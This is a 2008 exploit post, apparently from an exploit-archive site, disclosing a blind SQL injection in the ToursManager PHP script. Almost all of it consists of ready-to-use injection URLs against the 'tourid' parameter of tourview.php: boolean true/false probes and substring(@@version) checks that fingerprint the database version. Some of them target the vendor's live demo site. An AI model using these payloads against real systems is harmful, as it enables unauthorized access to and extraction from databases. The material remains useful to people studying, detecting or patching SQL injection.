toursmanager-blindsql.txt
Posted on 20 November 2008
[>] Name:--> ToursManager PhP Script <= Blind Sql Injection [>] Discovered by:--> XaDoS [>] ContacT m&:--> xados[at]hotmail.it [>] Site:--> http://www.toursmanager.com ######### [â– ] £XpLoIT: |: http://www.demosite.com/tourview.php?tourid=2%20and%201=1-- (true) |: http://www.demosite.com/tourview.php?tourid=2%20and%201=0-- (false) Version: |: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5 (true) |: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4 (false) V=> 5.x.x XD ######### [â– ] D&M0: |: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1-- |: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0-- |: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5 ######### [â– ] Th4Nks T0: > Boom3rang </ (very kind) ;-) > Langy </ > Str0ke </ #########
